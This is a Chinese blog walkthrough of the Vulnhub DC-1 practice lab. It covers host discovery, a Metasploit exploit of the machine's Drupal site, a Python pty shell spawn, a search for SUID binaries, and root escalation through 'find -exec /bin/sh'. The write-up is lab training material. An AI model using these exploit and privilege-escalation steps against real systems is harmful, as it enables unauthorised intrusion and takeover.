• Vulnhub DC1


    靶机简介

    DC-1是一个专门建造的易受攻击的实验室,目的是获得渗透测试领域的经验。它是为初学者设计的一个挑战,但它到底有多容易将取决于你的技能和知识,以及你的学习能力。总共有五个flag,但最终目标是在root的主目录中找到并读取该标志。您甚至不需要是root用户才能执行此操作,但是,您将需要root权限。根据你的技能水平,你可以跳过找到这些标志的大部分,直接去找根。

    前言

    以前打过的靶机,现在再回去重新回味一遍,不看wp磨一磨性子。五个flag,每个flag都会提供线索,但是我的最终目的是拿到root权限,所以不一定找到五个flag,如果可以的话直接拿root。如果不行的话就跟着flag走吧。

    getshell

    netdiscover 发现主机ip

    nmap扫一扫

    访问其80端口,发现了 Powered by Drupal

    百度一下Drupal漏洞(太多了)

    先用msf打一打

    msfconsole
    search Drupal
    

    利用最新的 2019-02-20试一下

    use 6
    set rhost 192.168.146.128
    set lhost 192.168.146.129
    run
    

    失败了 ,msf残忍的告诉我

    Exploit completed, but no session was created.

    再尝试一下 2018-03-28那个洞,成功拿到shell

    SUID提权

    用python模拟一终端

    python -c 'import pty;pty.spawn("/bin/sh")'

    找到正在系统上运行的所有SUID可执行文件

    find / -user root -perm -4000 -print 2>/dev/null
    find / -perm -u=s -type f 2>/dev/null
    find / -user root -perm -4000 -exec ls -ldb {} ;
    

    使用第一条就行了

    发现find命令,利用find提权

    find提权

    简介

    find命令是在指定目录下查找文件,并返回查找到的子目录和全部文件
      -exec<执行指令>:假设find指令的回传值为True,就执行该指令 #如果find有suid权限,那就可以通过find执行任意root命令
    

    利用

    直接在/tmp目录下创建个文件,然后用find找,自然会返回true。再利用-exec参数执行命令即可

    cd /tmp
    touch test
    find test -exec "/bin/sh" ;
    

  • 相关阅读:
    MQ消息队列(2)—— Java消息服务接口(JMS)
    MQ消息队列(1)—— 概念和使用场景
    SpringBoot — HelloWorld开发部署
    redis的配置文件介绍
    Redis info 参数详解
    10 分钟彻底理解 Redis 的持久化和主从复制
    Docker Yearning + Inception SQL审核平台搭建
    Inception SQL审核注解
    运行python脚本后台执行
    解决yum [Errno 256] No more mirrors to try
  • 原文地址:https://www.cnblogs.com/tlbjiayou/p/13829484.html
Copyright © 2020-2023  润新知